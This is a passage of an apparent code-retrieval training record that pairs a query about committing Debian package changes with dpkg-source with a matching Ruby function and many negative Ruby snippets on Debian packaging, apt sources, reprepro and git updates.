"0.5318476",
"0.53171295",
"0.53070235",
"0.5304166",
"0.5303312",
"0.5300788"
] | 0.82506204 | 0 |
Commit changes of a debian package using dpkgsource commit in a given directory (or the current one by default) | def dpkg_commit_changes(patch_name, directory = Dir.pwd,
prefix: "apaka-",
logfile: nil,
include_removal: false
)
Dir.chdir(directory) do
Packager.debug ("commit changes to debian pkg: #{patch_name}")
# Since dpkg-source will open an editor we have to
# take this approach to make it pass directly in an
# automated workflow
ENV['EDITOR'] = "/bin/true"
cmd = ["dpkg-source", "--commit"]
cmd << "--include-removal" if include_removal
cmd << "."
cmd << prefix + patch_name
if !system(*cmd,
[:out, :err] => redirection(logfile,"a"),
:close_others => true)
raise RuntimeError, "#{self.class}#{__method__}: failed to commit #{patch_name}"
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def dpkg_commit_changes(patch_name, directory = Dir.pwd)\n Dir.chdir(directory) do\n Packager.info (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n `dpkg-source --commit . #{patch_name}`\n end\n end",
"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def commit(msg = nil)\n require_dep! 'awesome_spawn'\n require_cmd! git_cmd\n\n in_repo { AwesomeSpawn.run \"#{git_cmd} add #{pkg_files.join(' ')}\" }\n super(msg.nil? ? \"updated to #{version}\" : msg)\n self\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def commit(opts = {:use_dirstate => true, :update_dirstate => true})\n valid = false # don't update the DirState if this is set!\n \n commit = ((modified || []) + (added || [])).sort\n remove = removed\n xtra = extra.dup\n branchname = xtra[\"branch\"]\n text = description\n \n p1, p2 = parents.map {|p| p.node }\n c1 = repo.changelog.read(p1) # 1 parent's changeset as an array\n c2 = repo.changelog.read(p2) # 2nd parent's changeset as an array\n m1 = repo.manifest.read(c1[0]).dup # 1st parent's manifest\n m2 = repo.manifest.read(c2[0]) # 2nd parent's manifest\n \n if opts[:use_dirstate]\n oldname = c1[5][\"branch\"]\n tests = [ commit.empty?, remove.empty?, !opts[:force],\n p2 == NULL_ID, branchname == oldname ]\n if tests.all?\n UI::status \"nothing changed\"\n return nil\n end\n end\n \n xp1 = p1.hexlify\n xp2 = p2 == NULL_ID ? \"\" : p2.hexlify\n \n Hook.run_hook :pre_commit\n journal = Amp::Mercurial::Journal.new(:opener => repo.store_opener)\n \n fresh = {} # new = reserved haha i don't know why someone wrote \"haha\"\n changed = []\n link_rev = repo.size\n \n (commit + (remove || [])).each {|file| UI::status file }\n \n # foreach file in commit:\n # commit_file file\n # end\n commit.each do |file|\n versioned_file = self[file]\n fresh[file] = versioned_file.commit :manifests => [m1, m2],\n :link_revision => link_rev,\n :journal => journal ,\n :changed => changed\n \n new_flags = versioned_file.flags\n \n # TODO\n # Clean this shit up\n if [ changed.empty? || changed.last != file, \n m2[file] != fresh[file]\n ].all?\n changed << file if m1.flags[file] != new_flags\n end\n m1.flags[file] = new_flags\n \n repo.staging_area.normal file if opts[:use_dirstate]\n end\n \n # add_manifest_entry\n man_entry, updated, added = *add_manifest_entry(:manifests => [m1, m2],\n :changesets => [c1, c2],\n :journal => journal ,\n :link_rev => link_rev,\n :fresh => fresh ,\n :remove => remove ,\n :changed => changed )\n\n # get_commit_text\n text = get_commit_text text, :added => added, :updated => updated,\n :removed => removed, :user => user ,\n :empty_ok => opts[:empty_ok] ,\n :use_dirstate => opts[:use_dirstate]\n \n # atomically write to the changelog\n # add_changelog_entry\n # for the unenlightened, rents = 'rents = parents\n new_rents = add_changelog_entry :manifest_entry => man_entry,\n :files => (changed + removed),\n :text => text,\n :journal => journal,\n :parents => [p1, p2],\n :user => user,\n :date => date,\n :extra => xtra\n \n \n # Write the dirstate if it needs to be updated\n # basically just bring it up to speed\n if opts[:use_dirstate] || opts[:update_dirstate]\n repo.dirstate.parents = new_rents\n removed.each {|f| repo.dirstate.forget(f) } if opts[:use_dirstate]\n repo.staging_area.save\n end\n \n # The journal and dirstates are awesome. Leave them be.\n valid = true\n journal.close\n \n # if an error and we've gotten this far, then the journal is complete\n # and it deserves to stay (if an error is thrown and journal isn't nil,\n # the rescue will destroy it)\n journal = nil\n \n # Run any hooks\n Hook.run_hook :post_commit, :added => added, :modified => updated, :removed => removed, \n :user => user, :date => date, :text => text,\n :revision => repo.changelog.index_size\n return new_rents\n rescue StandardError => e\n if !valid\n repo.dirstate.invalidate!\n end\n if e.kind_of?(AbortError)\n UI::warn \"Abort: #{e}\"\n else\n UI::warn \"Got exception while committing. #{e}\"\n UI::warn e.backtrace.join(\"\\n\")\n end\n \n # the journal is a vestigial and incomplete file.\n # destroyzzzzzzzzzzz\n journal.delete if journal\n end",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def upgrade_direct!\n remote_file local_path do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n dpkg_package local_path\n end",
"def download_src(src_package, src_dir)\n deprec.groupadd(group)\n sudo \"test -d #{src_dir} || sudo mkdir #{src_dir}\" \n sudo \"chgrp -R #{group} #{src_dir}\"\n sudo \"chmod -R g+w #{src_dir}\"\n # XXX check if file exists and if we have and MD5 hash or bytecount to compare against\n # XXX if so, compare and decide if we need to download again\n if defined?(src_package[:md5sum])\n md5_clause = \" && echo '#{src_package[:md5sum]}' | md5sum -c - \"\n end\n sudo <<-SUDO\n sh -c \"cd #{src_dir} && test -f #{src_package[:file]} #{md5_clause} || wget --timestamping #{src_package[:url]}\"\n SUDO\n end",
"def update\n `cd #{__dir__} && git pull origin master`\n install\nend",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def pkg_update\n pkg_fetch unless File::exists? @srcdir\n\n sysprint \"#{@name} update: #{@fetch_url}\"\n\n protocol = @fetch_url.split(':')\n\n if protocol.length == 0\n syserr \"Invalid package source URL #{@fetch_url}\"\n raise\n end\n\n case protocol\n when /^http$/i, /^https$/i, /^ftp$/i\n sysprint \"#{@name}: can't update from protocol #{protocol}\"\n when /git/i\n git_update(@fetch_url)\n else\n syserr \"Unhandled URL type: #{protocol}\"\n raise\n end\n end",
"def with_package_source(source_url, source_repos = [], options = {})\n source_prefix = options[:source] ? 'deb-src' : 'deb'\n source_patterns = [source_prefix, source_url] + source_repos \n \n source_contents = File.read '/etc/apt/sources.list'\n sources = source_contents.split(/(\\r|\\n)+/)\n source_exists = sources.any? do |source_line|\n source_frags = source_line.split(' ')\n source_patterns.all? { |pattern| source_frags.any? { |frag| frag == pattern } }\n end\n\n unless source_exists\n File.open('/etc/apt/sources.list', 'a') do |f|\n f.write \"#{source_prefix} #{source_url} #{source_repos.join(' ')}\\n\"\n end\n update_package_metadata\n end\n \n begin\n yield\n ensure\n unless source_exists\n File.open('/etc/apt/sources.list', 'w') { |f| f.write source_contents }\n update_package_metadata \n end\n end\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def linux_commit(c)\n\tgit = Git.open(project: 'linux')\n\tgit.gcommit(c)\nend",
"def update_datapackage\n update_file_in_repo(\"datapackage.json\", create_json_datapackage)\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def push_package!\n require 'packagecloud'\n pkg = Packagecloud::Package.new(file: package_file)\n client.put_package('duo-openvpn', pkg, distro_id)\n end",
"def install(pkg_name)\n begin\n pkg_build_dir = packaging_dir(pkg_name)\n filepath = Dir.glob(\"#{pkg_build_dir}/*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file found for #{pkg_name} in #{pkg_build_dir}: #{filepath}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{pkg_build_dir}: #{filepath}\"\n else\n filepath = filepath.first\n Packager.info \"Found package: #{filepath}\"\n end\n install_debfile(filepath)\n rescue Exception => e\n raise RuntimeError, \"Installation of package '#{pkg_name} failed -- #{e}\"\n end\n end",
"def update\n Puppet.debug(\"Debconf: updating #{resource[:name]}\")\n\n # Build the string to send\n args = [:package, :item, :type, :value].map { |e| resource[e] }.join(' ')\n\n IO.popen('/usr/bin/debconf-set-selections', 'w+') do |pipe|\n Puppet.debug(\"Debconf: debconf-set-selections #{args}\")\n pipe.puts(args)\n\n # Ignore remaining output from command\n pipe.close_write\n pipe.read(nil)\n end\n end",
"def create_package(sub_path)\n package = Tempfile.new(@commit_hash)\n @logger.info \"Creating #{package.path}\"\n Dir.chdir(@source_location + '/' + sub_path) do\n # add a commit_hash file whose contents represent the key for this package\n IO.write('commit_hash', @commit_hash)\n RakeUtils.system \"tar -zcf #{package.path} *\"\n end\n @logger.info 'Created'\n package\n end",
"def set_version(version, rootdir = Dir.pwd, options = {})\n exit_status = 0\n type = (options[:type]) ? options[:type] : FalkorLib.config[:versioning][:type]\n source = (options[:source]) ? options[:source] : FalkorLib.config[:versioning][:source][ type ]\n versionfile = File.join( rootdir, source[:filename] ) unless source[:filename].nil?\n major, minor, patch = major(version), minor(version), patch(version)\n #tocommit = \"\"\n case type\n when 'file'\n info \"writing version changes in #{source[:filename]}\"\n File.open(versionfile, 'w') { |f| f.puts version } #if File.exist? ( versionfile )\n when 'gem'\n info \"=> writing version changes in #{source[:filename]}\"\n File.open(versionfile, 'r+') do |f|\n text = f.read\n text.gsub!(/^(\\s*)MAJOR\\s*,\\s*MINOR,\\s*PATCH\\s*=\\s*(\\d+)\\s*,\\s*(\\d+)\\s*,\\s*(\\d+)(.*)$/,\n '\\1' + \"MAJOR, MINOR, PATCH = #{major}, #{minor}, #{patch}\" + '\\5')\n f.rewind\n f.write(text)\n end\n when 'puppet_module'\n info \"=> writing version changes in #{source[:filename]}\"\n metadata = JSON.parse( IO.read( versionfile ) )\n metadata[\"version\"] = version\n File.open(versionfile, \"w\") do |f|\n f.write JSON.pretty_generate( metadata )\n end\n #exit 1\n end\n if FalkorLib::Git.init?(rootdir)\n filelist = FalkorLib::Git.list_files( rootdir )\n Dir.chdir( rootdir ) do\n next if source[:filename].nil?\n unless filelist.include?( source[:filename] )\n warning \"The version file #{source[:filename]} is not part of the Git repository\"\n answer = ask(\"Adding the file to the repository? (Y|n)\", 'Yes')\n next if answer =~ /n.*/i\n exit_status = FalkorLib::Git.add(versionfile, \"Adding the version file '#{source[:filename]}', inialized to the '#{version}' version\" )\n next\n end\n run %( git diff #{source[:filename]} )\n answer = ask(cyan(\"=> Commit the changes of the version file to the repository? (Y|n)\"), 'Yes')\n next if answer =~ /n.*/i\n run %( git commit -s -m \"bump to version '#{version}'\" #{source[:filename]} )\n exit_status = $?.to_i\n # if (type == 'gem' && File.exists?(File.join(rootdir, 'Gemfile')) )\n # run %{\n # sleep 2\n # bundle update falkorlib\n # git commit -s -m \"Update Gemfile.lock accordingly\" Gemfile.lock\n # } if command?( 'bundle' )\n # end\n end\n end\n exit_status\n end",
"def git_update(target)\n cmd = \"git fetch\"\n\n FileUtils.cd(target) do\n sysexec(cmd)\n end\nend",
"def run_dpkg(tmp_dir, k_id)\n self.populate_package tmp_dir\n (key = \"-k#{k_id}\") unless k_id == \"\"\n stdout = `dpkg-buildpackage -rfakeroot #{key} 2>&1`\n ActiveRecord::Base.logger.debug stdout \n if $?.success?\n true\n else\n false\n end \n end",
"def install_dmd(source, file, build_dir, prefix)\n remote_file \"#{Chef::Config[:file_cache_path]}/#{file}\" do\n source source + file\n mode '0644'\n action :create_if_missing\n not_if \"test -e #{prefix}/linux/bin64/dmd\"\n end\n\n bash \"install-#{build_dir}\" do\n user 'root'\n cwd Chef::Config[:file_cache_path]\n\n code <<-EOH\n set -e\n\n rm -r #{build_dir} || true\n tar xf #{file}\n\n rm -r #{prefix} || true\n cp -r #{build_dir} #{prefix}\n rm -r #{build_dir}\n EOH\n\n not_if \"test -e #{prefix}/linux/bin64/dmd\"\n end\nend",
"def commit\n system(\"cd #{repo_path};git commit -m 'to the cloud'\")\n end",
"def upgrade_package(name, cmdline_args = '', opts = {})\n case self['platform']\n when /sles-/\n execute(\"zypper --non-interactive --no-gpg-checks up #{name}\", opts)\n when /el-4/\n @logger.debug(\"Package upgrade is not supported on rhel4\")\n when /fedora-22/\n execute(\"dnf -y #{cmdline_args} update #{name}\", opts)\n when /cisco|fedora|centos|eos|el-/\n execute(\"yum -y #{cmdline_args} update #{name}\", opts)\n when /ubuntu|debian|cumulus/\n update_apt_if_needed\n execute(\"apt-get install -o Dpkg::Options::='--force-confold' #{cmdline_args} -y --force-yes #{name}\", opts)\n when /solaris-11/\n execute(\"pkg #{cmdline_args} update #{name}\", opts)\n when /solaris-10/\n execute(\"pkgutil -u -y #{cmdline_args} ${name}\", opts)\n else\n raise \"Package #{name} cannot be upgraded on #{self}\"\n end\n end",
"def setup debian_repository\n write_config debian_repository\n restart\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def install_fake_pkg(name)\n require_relative 'ci-tooling/lib/dpkg'\n Dir.mktmpdir do |tmpdir|\n Dir.chdir(tmpdir) do\n FileUtils.mkpath(\"#{name}/DEBIAN\")\n File.write(\"#{name}/DEBIAN/control\", <<-EOF.gsub(/^\\s+/, ''))\n Package: #{name}\n Version: 999:999\n Architecture: all\n Maintainer: Harald Sitter <sitter@kde.org>\n Description: fake override package for kubuntu ci install checks\n EOF\n system(\"dpkg-deb -b #{name} #{name}.deb\")\n DPKG.dpkg(['-i', \"#{name}.deb\"])\n end\n end\nend",
"def upgrade_package(name, cmdline_args = '', opts = {})\n case self['platform']\n when /opensuse|sles-/\n execute(\"zypper --non-interactive --no-gpg-checks up #{name}\", opts)\n when /el-4/\n @logger.debug(\"Package upgrade is not supported on rhel4\")\n when /fedora-(2[2-9]|3[0-9])/\n execute(\"dnf -y #{cmdline_args} update #{name}\", opts)\n when /cisco|fedora|centos|redhat|eos|el-/\n execute(\"yum -y #{cmdline_args} update #{name}\", opts)\n when /ubuntu|debian|cumulus|huaweios/\n update_apt_if_needed\n execute(\"apt-get install -o Dpkg::Options::='--force-confold' #{cmdline_args} -y --force-yes #{name}\", opts)\n when /solaris-11/\n if opts[:acceptable_exit_codes]\n opts[:acceptable_exit_codes] << 4\n else\n opts[:acceptable_exit_codes] = [0, 4] unless opts[:accept_all_exit_codes]\n end\n execute(\"pkg #{cmdline_args} update #{name}\", opts)\n when /solaris-10/\n execute(\"pkgutil -u -y #{cmdline_args} #{name}\", opts)\n else\n raise \"Package #{name} cannot be upgraded on #{self}\"\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def after_source_download\n Dir.chdir cachedir/name do\n sh \"git checkout #{version}\"\n sh 'git submodule update --init'\n end\n end",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks 